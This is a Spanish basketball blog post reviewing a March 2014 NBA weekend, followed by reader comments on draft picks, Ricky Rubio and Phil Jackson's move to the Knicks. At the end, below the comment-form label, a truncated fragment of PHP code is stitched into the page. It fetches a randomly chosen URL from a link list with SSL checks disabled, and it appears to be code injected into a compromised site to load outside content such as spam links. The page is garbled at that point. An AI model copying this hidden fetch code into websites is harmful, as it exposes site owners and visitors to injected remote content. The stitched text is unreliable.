Informe del fin de semana: ¿Nadie quiere el liderato?

10 de March de 2014 por TheDeerHunter

Hasta la cabeza del Este se contagia de la dinámica perdedora. Crisis simultánea para Pacers y Heat con 3 derrotas consecutivas justo cuando ya deberíamos estar asisitiendo a la mejor versión de ambos en el tramo final de la regular. Extrañas sensaciones y caldos de cultivo para futuros culebrones. A lo que comentábamos de Phil Jackson y a las supuestas gestiones de Noah con Carmelo en el all-star, se une la presencia de LeBron en el homenaje a su amigo Ilgauskas en Cleveland, despertando todos los recelos del mundo en su actual franquicia.

Pero vayamos a lo importante, empezando por el viernes.

“Victoria de Charlotte frente a los Cavs y ya se ponen 5 victorias por encima de los novenos, que son los Pistons.” Txusma

Resultado magnífico para los Bobcats, no sólo por la victoria en sí, sino porque era ante uno de sus más inmediatos perseguidores y, porque además coincidía con la derrota de los Pistons en Minneapolis. Viendo la dinámica de los Hawks, que caían sin paliativos en Oakland, parece que ya tocan los playoffs con la punta de los dedos. No sólo eso, Rondo y los Celtics rompían la racha victoriosa de los Nets y como comentábais la 6ª plaza sería una bendición muy al alcance, evitando de esta manera a Indiana y Miami. Los Raptors serían el mal menor, lógicamente, aunque los canadienses no serán una perita en dulce para nadie y el viernes volvían a demostrar su buen hacer ante Sacramento con Gay dejándose querer por su antigua franquicia. Sin embargo, aparentemente le echan muy poco de menos en Canadá. 

Los Grizzlies también daban un paso importantísimo en uno de sus mejores partidos del año. Dieron de su propia medicina a los Bulls y los dejaron  en 77 puntos con exhibición de Marc Gasol al que osamos cuestionar la semana pasada. Aún le van a necesitar mucho así. No obstante la satisfacción no fue completa pues los Mavs lograron doblegar a los Blazers a pesar del partidazo de Aldridge y defendieron nuevamente la 8ª plaza.

En el partido estrella de la jornada los Rockets le dieron una soberana paliza a los Pacers con un James Harden desatado, agresivo como pocas veces. 38 puntos que endosaron en el tercer cuarto a una de las mejores defensas de la liga. ¿Y qué le pasa a Paul George? Con todo, los Pacers han sido los primeros clasificados matemáticamente para la postemporada.

Finalmente, Anthony Davis y Tyreke Evans se merendaron a unos Bucks desquiciados y los Nuggets le endosaron 138 puntos a la defensa de chiste de D’Antoni y los Lakers. Curioso que se empiece a hablar de despido ahora. Casi nos olvidamos de que los Knicks ganaron a los Jazz.

El sábado…

“Dos partidos en dos noches, demasiado para los bobcats, más si sus rivales son Gasol y Randolph, que al parecer son los únicos capaces de parar a Jefferson” Esteban

Efectivamente, Al Jefferson lo pasó comprensiblemente fatal ante la parejita y además su equipo mostró mayor desgaste que los Grizzlies, a pesar del intenso partido del día anterior en Chicago. Por su parte, los Knicks lograban su segunda victoria consecutiva ante Cleveland a pesar de Irving y, parece mentira, se vuelven a colar en la pomada. Los Jazz ganaban a los Sixers, el peor equipo de la liga ahora mismo aunque estén los Bucks, capaces de hacer a los Wizards parecerse al Dream Team en una primera parte de 75 puntos. Dos viejos rockeros como Parker y Ginobili recordaron a los de las mejores tardes anotando 54 puntos entre ambos a Orlando para volver a colocarse en la cabeza de la liga.

Y los Clippers esta vez con la suerte de los grandes junto a la mala suerte de los gafados se hacían con su 7ª victoria consecutiva:

“Dos abajo para Hawks a falta de 1 segundo, y tiros libres para Teague para forzar la prorroga. El primero lo falla, y el segundo lo tira a fallar y la mete.” Denise.

Pero lo mejor aún estaba por venir… El fin de fiesta del domingo comenzaba con un apasionante Heat@Bulls, una espina que aún se les clava a los campeones de vez en cuando. Jimmy Butler se doctoró con una defensa épica sobre un LeBron que juega ya sin la máscara, y junto a Noah y Augustin formaron su particular versión del Big Three para llevar a sus rivales a la prórroga y una vez allí terminar de asfixiarles.

“Vaya prorroga de los Heat, triple tras triple que es lo peor que tienen jugadores como Wade o James… Bosh también falló uno” Jose Luis

Después asistíamos atónitos a la derrota de los Thunder ante Jodie “Black Mamba” Meeks y los Lakers…

“Lakers=Como ganar un partido con un sólo rebote ofensivo, de Pau Gasol. Los Thunder han cogido 23 rebotes más y han perdido…” Vader

Sin Sefolosha, Brooks dispuso una alineación grandísima con Durant, Perry Jones, Ibaka y Adams. No sabemos si deslumbrados por la horrible equipación de Lakers, la defensa hizo aguas por todos lados y Meeks, uno de nuestros ídolos entrañables, se puso las botas como nunca.

Como no hay dos sin tres los Pacers también tropezaban en Dallas, con una aportación ridícula de la segunda unidad y una defensa muy por debajo de lo que se les debe exigir, si es que siguen siendo aspirantes al anillo. Cuarta derrota consecutiva, señores.

En el resto de apasionante jornada de domingo pudimos disfrutar de dos choques más con prórroga: la victoria de los Pelicans ante Denver con una nueva “burrada” de Anthony Davis y la de los Rockets ante Blazers, con Harden tocando la guitarra. Justo MVP del fin de semana.

Los Suns, esta vez sí, caían en Oakland y pierden eventualmente su plaza de playoffs… aunque se anuncia la inminente vuelta de Bledsoe. Uno de los que aspiran a esa octava plaza, los Wolves, caían ante Raptors con triple doble de Lowry y se dejan gran parte de sus opciones. Para terminar, Rondo diseccionó a los Pistons y Thornton se salió para que los Nets volvieran a la senda de la victoria ante Sacramento.

Comenta

23 comentarios a esta entrada

  1. txusma dice:
    #1

    Desde que ha vuelto Westbrook de la lesión los Thunder han ganado 3 de los 8 partidos que han jugado…

      Citar

  2. Jose Luis dice:
    #2

    Vaya triple-airball se cascó ayer el amigo Westbrook a falta de 30 segundos o así… puf

    En fin, si los tienen que ganar algún partido, que sea así: ante un coco y con actuaciones estelares.

      Citar

  3. Jose Luis dice:
    #3

    Si los Lakers quería decir xD

      Citar

  4. Ruxixon dice:
    #4

    Me autocito,

    “Dudo incluso que en esa racha que comenta Nacho (hacia referencia a una racha de 7-1 para que mantuviera unas mínimas opciones,siendo bastante escéptico al respecto) se de cuando te visitan los Raptors,que te llevan los partidos a lo que les interesa a ellos,o tienes que ir a jugar contra los Bobcats que están de dulce.”

    Chau chau Minny perdiendo en casa contra los Raptors.Lo que parecía era uno de los proyectos más prometedores de la liga se ha quedado en nada entre lesiones,malas decisiones y una pérdida del rumbo desde el banquillo.

      Citar

  5. Jose Luis dice:
    #5

    Ruxixon:
    Me autocito,

    “Dudo incluso que en esa racha que comenta Nacho (hacia referencia a una racha de 7-1 para que mantuviera unas mínimas opciones,siendo bastante escéptico al respecto) se de cuando te visitan los Raptors,que te llevan los partidos a lo que les interesa a ellos,o tienes que ir a jugar contra los Bobcats que están de dulce.”

    Chau chau Minny perdiendo en casa contra los Raptors.Lo que parecía era uno de los proyectos más prometedores de la liga se ha quedado en nada entre lesiones,malas decisiones y una pérdida del rumbo desde el banquillo.

    Derrick Williams y Johnny Flynn…

    Si hubieran cogido a Klay Thompson en lugar del primero… o Valanciunas o Kanter, pivot siempre se traspasa bien.

    Oh dios mío 🙁 me olvidaba de Wesley Johnson… y después salió gente como Hayward o George si querían un alero… o Cousins, Monroe…

    En fin xD

      Citar

  6. Jose Luis dice:
    #6

    La verdad es que hay equipos que no tienen ojo, y no hay más…

    Wolves: Love, Flynn, Rubio, Johnson, Derrick Williams, X, Muhammad
    Kings: Jason Thompson, Evans, Cousins, Fredette, Robinson, McLemore
    Cavs: Irving, Thompson, Waiters, Bennet
    Bobcats: Augustin, Henderson, X, Walker, Biyombo, Gilchrist, Zeller

    ¿Quienes han justificado su pick por ahora? Love, Cousins, Irving, Walker. Luego en un grupo de no justificar pero ser buen jugador, Evans, Rubio, ¿ambos Thompson? ¿Waiters?

    A los rookies les concedermos el beneficio de la duda.

      Citar

  7. Vader dice:
    #7

    Yo creo que el problema es que sobrevaloramos un poquito el draft. Salvo algún año muy contado normalmente en cada mock hay uno o dos futuras estrellas, el resto buenos jugadores o jugadores de rol. Y claro tener la suerte de pescar esa “estrella” pues no es fácil. Un equipo si que la tuvo fue Oklah

      Citar

  8. Vader dice:
    #8

    Yo creo que el problema es que sobrevaloramos un poquito el draft. Salvo algún año muy contado normalmente en cada mock hay uno o dos futuras estrellas, el resto buenos jugadores o jugadores de rol. Y claro tener la suerte de pescar esa “estrella” pues no es fácil. Un equipo si que la tuvo fue Oklahoma eligiendo a Durant, Wesbrook y Harden (+Ibaka), pero eso es la excepción… Lo normal es que con 3 o 4 buenos picks de diferentes años te salga una estrella y el resto con suerte buenos jugadores y con mala suerte puffos.

    Saludos

      Citar

  9. Jose Luis dice:
    #9

    Utah tampoco lo ha hecho mal. Kanter, Favors, Hayward, Burke.

    A priori tienen buena pinta, quizá algo de decepción el turco por ser un pick3, aunque los hombres grandes tardan en desarrollarse.

    Indiana? Hibbert, Stephenson, George, y por en medio sacaron su ronda por George Hill
    Warriors con Curry, Thompson, Barnes, tampoco está nada mal.
    Blazers: Batum, Aldridge, Lillard, Matthews… y pena de Roy y Oden (bueno si estos hubieran estado bien, no hubieran tenido a Lillard xD)

    No sé, creo que hay franquicias muy malas para el draft

      Citar

  10. rumbero dice:
    #10

    txusma:
    Desde que ha vuelto Westbrook de la lesión los Thunder han ganado 3 de los 8 partidos que han jugado…

    Desde que h?a? ?v?u?e?l?t?o? ?W?e?s?t?b?r?o?o?k? ?d?e? ?l?a? ?l?e?s?i?ó?n? se lesionó Perkins los Thunder han ganado 3 de los 8 partidos que han jugado…

      Citar

  11. Vader dice:
    #11

    Jose Luis:
    Utah tampoco lo ha hecho mal. Kanter, Favors, Hayward, Burke.

    A priori tienen buena pinta, quizá algo de decepción el turco por ser un pick3, aunque los hombres grandes tardan en desarrollarse.

    Indiana? Hibbert, Stephenson, George, y por en medio sacaron su ronda por George Hill
    Warriors con Curry, Thompson, Barnes, tampoco está nada mal.
    Blazers: Batum, Aldridge, Lillard, Matthews… y pena de Roy y Oden (bueno si estos hubieran estado bien, no hubieran tenido a Lillard xD)

    No sé, creo que hay franquicias muy malas para el draft

    Y acuerdate que Aldridge lo draftearon los Bulls e inmediatamente lo traspasaron a Blazers a cambio de ¿Tyrus Thomas?

    @rumbero

    Jajaja grande Perkins!!! Es la clave del equipo!!!

      Citar

  12. rumbero dice:
    #12

    Se la ha ido la olla con los caracteres, quería tachar “ha vuelto Westbrook de la lesión”. 3-7 lleva esta temporada OKL sin Perkins.

    Jose Luis:
    Indiana? Hibbert, Stephenson, George, y por en medio sacaron su ronda por George Hill

    Y esa ronda fue Kawhi Leonard.

      Citar

  13. Jose Luis dice:
    #13

    Y cediendo más de 110ppp sin Perkins.

    Sí, pero tenían a George… entiendo que soltasen un prospecto interesante como Leonard, por Hill que aunque no es un base al uso, es un muy buen jugador.

    A mí siempre me gustó más como escolta, la verdad, pero está jugando bastante bien como base.

      Citar

  14. HisRoyalAirness dice:
    #14

    Ah, que Rubio es una cagada del draft, ok.
    Debe de ser el único sitio en el que he leído eso. El chaval aún no ha jugado ni el correspondiente a 2 temporadas completas, su equipo hace aguas por todas partes, el banquillo es lamentable y aún así hay equipos (Pacers, OKC) que matarían por él. Y no anota una mierda, ok, pero en los últimos 2 meses promedia 4-5 tiros de campo por partido.
    El otro día vi una entrevista con Larry Bird, un tipo que sabe algo del tema, y le preguntaban: “es Rubio uno de los mejores pasadores de la liga?” Respuesta: “no, de hecho es uno de los mejores pasadores que he visto en mi vida y su defensa está altamente infravalorada. Mejorará algo su tiro y va a ser un grande”

      Citar

  15. Vader dice:
    #15

    A mi Rubio me encanta, siempre lo querria en mi equipo…

      Citar

  16. Jose Luis dice:
    #16

    Yo no he dicho que sea cagada, digo que quizá no haya justificado su pick aun. A mi no me parece cagada ni mucho menos.

      Citar

  17. futurman dice:
    #17

    No creo que nadie haya dicho que Rubio es un error, simplemente, se esperaba más de él. El problema de Wolves son que de 6-7 picks han sacado a Rubio, a Love y a Pekovic. Con grandes decepciones como Williams.

      Citar

  18. Txusma dice:
    #18

    A Matheews no lo drafteó nadie pero firmó aquel mismo año por los Jazz y no lo hizo nada mal.

    Rubio cagada no es pero igual q lees opiniones como la de Bird puedes encontrar otras que dicen que está muy sobrevalorado. Ha de mejorar el tiro ya pq no puede ser que su equipo lo siente en los minutos finales de algunos partidos.

      Citar

  19. Denise dice:
    #19

    Del Draft de Ricky, por detras suya fueron elegidos muchos bases, para mí, al menos, mejores que él.
    Curry – Pick 7
    Jrue Holiday – 17
    Ty Lawson -18
    J. Teague – 19
    Jennings – 10 (este no creo que sea mejor jugador que Rubio, pero andan a la par)

      Citar

  20. HisRoyalAirness dice:
    #20

    Txusma:
    A Matheews no lo drafteó nadie pero firmó aquel mismo año por los Jazz y no lo hizo nada mal.

    Rubio cagada no es pero igual q lees opiniones como la de Bird puedes encontrar otras que dicen que está muy sobrevalorado. Ha de mejorar el tiro ya pq no puede ser que su equipo lo siente en los minutos finales de algunos partidos.

    Hola Txus. Sí, yo también he leído/oído/visto esas opiniones pero me hago una reflexión: siempre provienen de gente que realiza coberturas nacionales. Me explico, en U.S.A. los periodistas y los medios se mueven por mercados locales o nacionales. Los nacionales como calan más se dedican a hablar de mercados grandes y además denostan e ignoran de una manera sangrante los mercados humildes. En estos años (en los que nos es tan fácil acceder a los partidos etc) me ha llamado la atención la desinformación absoluta de ciertos profesionales tipo Skip Bayless, Stephen A.Smith o Arash M. entre otros, sobre ciertos equipos. Se nota que ni los ven. De hecho uno de los programas que más me gusta y que sigo semanalmente, Inside the NBA de la TNT, ha hecho este año UNA mención de Kevin Love. Ya no hablo del resto. O el año pasado cuando todos rajaron de la elección de Marc como DPOY y de Chandler nadie dijo ni mu. Los comentaristas menos populistas como los locales (no sólo de Minny) o gente más friki tipo Seikou Smith o Chris Sheridan aprecian mayores matices que las estadísticas y su criterio, con Ricky concretamente, es altamente positivo.
    lo del tiro no voy a discutirlo, es una obviedad de proporciones inenarrables.
    Es mi humilde visión, perdón por el tocho

      Citar

  21. Denise dice:
    #21

    Phil Jackson a Knicks, según ESPN

      Citar

  22. Vader dice:
    #22

    Denise:
    Phil Jackson a Knicks, según ESPN

    Dicen que esta muy cerca pero creo que sigue sin confirmarse. También suena que si finalmente llega Jackson el próximo entrenador de los Knicks podría ser Steve Kerr.

    Por cierto ya hace varios partidos que a Stoudemire se le ve mucho mejor, que lastima de lesiones…

    Saludos

      Citar

  23. Vader dice:
    #23

    De todas formas no veo muy claro el tema Phil Jackson… Tiene 68 años, vive muy a gusto en California, su novia es directiva de los Lakers… No sé, no lo veo claro. Es posible que un trabajo de front-office lo pueda hacer en su mayor parte a distancia, pero creo que no es lo mismo que estar “dentro” de la organización de forma física.

    A ver como termina el tema, si llega a Knicks o no, en que condiciones y en caso de firmar como acaba el invento.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>